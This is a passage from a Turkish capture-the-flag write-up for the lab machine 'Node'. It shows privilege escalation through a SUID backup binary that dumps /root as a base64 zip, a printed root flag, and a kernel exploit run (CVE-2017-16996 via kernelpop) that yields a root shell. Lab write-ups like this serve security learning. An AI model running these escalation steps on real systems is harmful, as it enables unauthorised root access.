puts("UEsDBDMDAQBjAG++IksAAAAA7QMAABgK"...UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
) = 1525
exit(0 <no return ...>
+++ exited (status 0) +++
Görüldüğü üzere shared ve dinamik kütüphaneler ekrana basıldı ve /root ile başlayan ifadelerde program bir kırınıma uğraıyor gibi. Bunun üzerine / klasörüne gidip kodu orada çalıştırdım ve sadee root demem yetti.
tom@node:/$ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 root
<4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 root
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@node:/$
┌──(root💀kali)-[~/oscp/node]
└─# echo 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 | base64 -d >> root.zip
┌──(root💀kali)-[~/oscp/node]
└─# unzip root.zip
Archive: root.zip
creating: root/
[root.zip] root/.profile password:
inflating: root/.profile
extracting: root/.bash_history
creating: root/.cache/
extracting: root/.cache/motd.legal-displayed
extracting: root/root.txt
inflating: root/.bashrc
creating: root/.nano/
extracting: root/.nano/search_history
┌──(root💀kali)-[~/oscp/node]
└─# cd root
┌──(root💀kali)-[~/oscp/node/root]
└─# ls
root.txt
┌──(root💀kali)-[~/oscp/node/root]
└─# cat root.txt
1722e99ca5f353b362556a62bd5e6be0
Güzel, artık root olalım. kernelpop is back! Makineye bu harika aracı yükledim ve boom!
mark@node:/tmp/kernelpop$ python kernelpop.py -e CVE201716996
##########################
# welcome to kernelpop #
# #
# let's pop some kernels #
##########################
[*] attempting to perform exploitation with exploit CVE201716996
Would you like to run exploit CVE201716996 on this system? (y/n): y
[*] writing the exploit source to disk (/tmp/CVE201716996.c)
[*] compiling exploit CVE201716996 to /tmp/CVE201716996
[*] gcc -o /tmp/CVE201716996 /tmp/CVE201716996.c
[+] compilation successful!
[*] performing exploitation of CVE201716996
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880027e2ce00
[*] Leaking sock struct from ffff880029d86000
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88002b283840
[*] UID from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff88002b283840
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),1001(mark)
İlk Yorumu Siz Yapın